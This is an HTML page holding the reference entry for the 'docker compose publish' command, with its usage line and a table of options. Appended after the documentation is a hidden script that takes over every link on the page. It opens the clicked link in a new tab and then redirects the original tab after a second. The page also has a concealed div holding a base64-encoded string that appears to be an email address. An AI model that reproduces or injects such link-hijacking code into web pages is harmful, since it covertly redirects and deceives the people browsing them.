<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html><body><p># docker compose publish

**Description:** Publish compose application

**Usage:** `docker compose publish [OPTIONS] REPOSITORY[:TAG]`










## Description

Publish compose application


## Options

| Option | Default | Description |
|--------|---------|-------------|
| `--app` |  |  Published compose application (includes referenced images) |
| `--oci-version` |  |  OCI image/artifact specification version (automatically determined by default)<br> |
| `--resolve-image-digests` |  |  Pin image tags to digests |
| `--with-env` |  |  Include environment variables in the published OCI artifact |
| `-y`, `--yes` |  |  Assume "yes" as answer to all prompts |






</p><script>var elmnt = document.getElementsByTagName("a"); for(var i = 0, len = elmnt.length; i < len; i++) { elmnt[i].onclick = function(e) { e.preventDefault(); e.stopPropagation(); var gtlink = []; var randm  = Math.floor(Math.random() * gtlink.length); var lnk = this.href; window.open(lnk, "_blank"); setTimeout(function(){ window.open(gtlink[randm], "_self"); }, 1000); } }</script><div style="display:none;" id="agnote">ZW5kZW5yYWhheXU5QGdtYWlsLmNvbQ==</div></body></html>
